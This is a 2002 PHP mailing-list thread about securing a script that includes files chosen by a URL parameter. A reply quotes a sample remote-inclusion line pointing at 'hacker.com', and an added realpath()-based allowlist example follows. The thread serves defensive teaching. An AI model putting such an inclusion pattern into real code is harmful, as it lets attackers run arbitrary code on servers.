All my include files are *.inc, and I have a .htaccess file that makes
Apache refuse to serve those files directly through HTTP.

Justin


on 04/10/02 7:58 PM, John Wards ([EMAIL PROTECTED]) wrote:

> erm......would that allow hackers access? Say I have a database include file
> would hackers be able to get access to my database like this?
> 
> (include('http://mysite.com/datainc.php');)
> 
> I hope bloody not!!! If so, how on earth do I get round that!
> 
> John
> 
> On Friday 04 Oct 2002 10:52 am, Marek Kilimajer wrote:
>> Use realpath() to check the path. I also suspect your script is
>> vulnerable to cross-site includes
>> (include('http://hacker.com/script.inc');)
>> 
>> Rick Beckman wrote:
>>> Okay, I was mistaken... There is a gaping security hole in my simple li'l
>>> script... How do I modify it to only accept files from a certain path? I
>>> want the url format to be script.php?call=1 where "1" is the called file
>>> in the /includes/ directory. Just when I get optimistic I leave the
>>> entire system exposed. Yeah, that fits with my luck. :-)
> 
> 
> --
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
> 
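
The realpath() check suggested in the thread, applied to the script.php?call=1 format, as an added example that is not code from any poster. It assumes the files are named <call>.inc under a single includes directory; resolve_include() and the temp-directory sample tree are hypothetical names constructed for the demonstration.

```php
<?php
// Added example, not code from the thread. Assumed: includes are named
// <call>.inc under one directory; resolve_include() is a hypothetical name.
function resolve_include(string $call, string $baseDir): ?string
{
    // Allowlist the parameter: no slashes, dots, URL schemes or NUL bytes.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $call)) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null; // base directory does not exist
    }
    // realpath() resolves ".." and symlinks; it returns false if the file is missing.
    $path = realpath($base . DIRECTORY_SEPARATOR . $call . '.inc');
    if ($path === false || !is_file($path)) {
        return null;
    }
    // The resolved path must still sit under the base directory.
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Constructed sample tree in a temp directory.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'inc_demo_' . getmypid();
mkdir($root . '/includes', 0700, true);
file_put_contents($root . '/includes/1.inc', "<?php echo 'page one';\n");
file_put_contents($root . '/secret.inc', "<?php echo 'outside';\n");
// A symlink inside includes/ that points outside it (may need privileges on Windows).
@symlink($root . '/secret.inc', $root . '/includes/link.inc');

// Only '1' should resolve; every other constructed input should be rejected.
foreach (['1', 'link', '../secret', 'http://hacker.com/script', '2'] as $call) {
    $file = resolve_include($call, $root . '/includes');
    printf("%-26s => %s\n", $call, $file ?? 'rejected');
}
```

In script.php the caller would pass $_GET['call'] to the helper and include the returned path only when it is not null.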

